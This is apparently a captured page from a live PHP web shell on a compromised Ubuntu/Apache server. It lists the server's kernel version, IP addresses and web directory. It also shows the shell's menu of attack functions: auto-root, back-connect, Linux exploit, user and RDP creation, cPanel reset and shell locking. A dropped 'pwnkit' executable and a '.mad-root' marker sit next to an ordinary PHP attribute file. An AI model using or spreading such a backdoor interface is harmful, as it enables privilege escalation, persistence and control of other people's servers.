Linux 5474007-topit 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
Apache/2.4.52 (Ubuntu)
: 85.198.82.39 | : 216.73.216.129
Cant Read [ /etc/named.conf ]
8.3.30
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
back /
app /
Attributes /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
CustomAttribute-20260127221844...
453
B
-rw-r--r--
OpenApiExceptionsResponse-2026...
1022
B
-rw-r--r--
OpenApiExceptionsResponse.php
1022
B
-rw-r--r--
OpenApiPaginatedResponse.php
918
B
-rw-r--r--
OpenApiValidationErrorResponse...
726
B
-rw-r--r--
OpenApiValidationErrorResponse...
726
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : CustomAttribute-20260127221844.php
<?php declare(strict_types=1); namespace App\Attributes; use Attribute; // Атрибут, который получает имя функции через глобальную переменную #[Attribute(Attribute::TARGET_METHOD)] class CustomAttribute { public function __construct() { } public function getFunctionName(): string { global $_current_function_name; return $_current_function_name; } }
Close